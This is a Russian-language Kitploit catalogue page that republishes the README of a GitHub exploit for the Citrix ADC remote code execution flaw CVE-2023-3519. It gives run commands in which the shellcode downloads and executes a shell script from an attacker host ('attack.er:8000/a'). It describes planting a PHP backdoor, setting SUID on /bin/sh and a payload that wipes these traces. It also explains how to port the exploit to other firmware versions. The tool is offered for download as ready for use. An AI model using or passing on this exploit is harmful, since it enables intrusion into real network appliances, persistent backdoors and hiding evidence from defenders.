Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2023-3519 | Kitploit
Инструменты/GitHubGitHub/passwa11/cve-2023-3519
Анализ уязвимостейЭксплуатацияШелл-кодЭксплуатация веб-приложенийИнструмент Удаленного ДоступаРазработка Полезной Нагрузки
GitHubpasswa11/cve-2023-3519

CVE-2023-3519

Репозиторий
113 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Citrix ADC RCE CVE-2023-3519

Этот эксплойт использует адреса и shellcode для Citrix VPX 13.1-48.47. Полный разбор доступен здесь.

Использование

Для сборки shellcode требуется NASM.

root@kitploit:~
$ sudo apt install nasm

Включённый shellcode загружает и запускает shell-скрипт с удалённого http(s)-сервера. Скрипт принимает 3 аргумента: целевой хост, целевой порт и URL полезной нагрузки в виде shell-скрипта. Пример полезной нагрузки, которая выполняет id и uname -a, а затем убирает за собой следы, включён в этот репозиторий.

root@kitploit:~
$ echo 'id' > a
$ python3 -m http.server &
$ python3 cve-2023-3519.py victim.com 443 attack.er:8000/a

URL должен быть достаточно коротким, чтобы поместиться в буфер shellcode; если он слишком длинный, вы получите предупреждение.

Артефакты shellcode

Shellcode создаст PHP-бэкдор в /var/netscaler/logon/a.php и установит SUID-бит на /bin/sh. Включённая полезная нагрузка sh показывает пример автоматической очистки этих артефактов. Также обратите внимание, что shellcode не закрывает свои файловые дескрипторы, поэтому чрезмерно частое повторное использование эксплойта может привести к исчерпанию ресурсов.

Адаптация под другие версии

Для целей Citrix на базе FreeBSD вам, скорее всего, понадобится найти лишь 3 значения: смещение сохранённого обратного адреса, ROP-гаджет jmp rsp (или что-то эквивалентное, например push rsp; ret;) и адрес перехода, чтобы избежать аварийного завершения. Эти параметры жёстко заданы в начале файла cve-2023-3519.py.

Скачать инструмент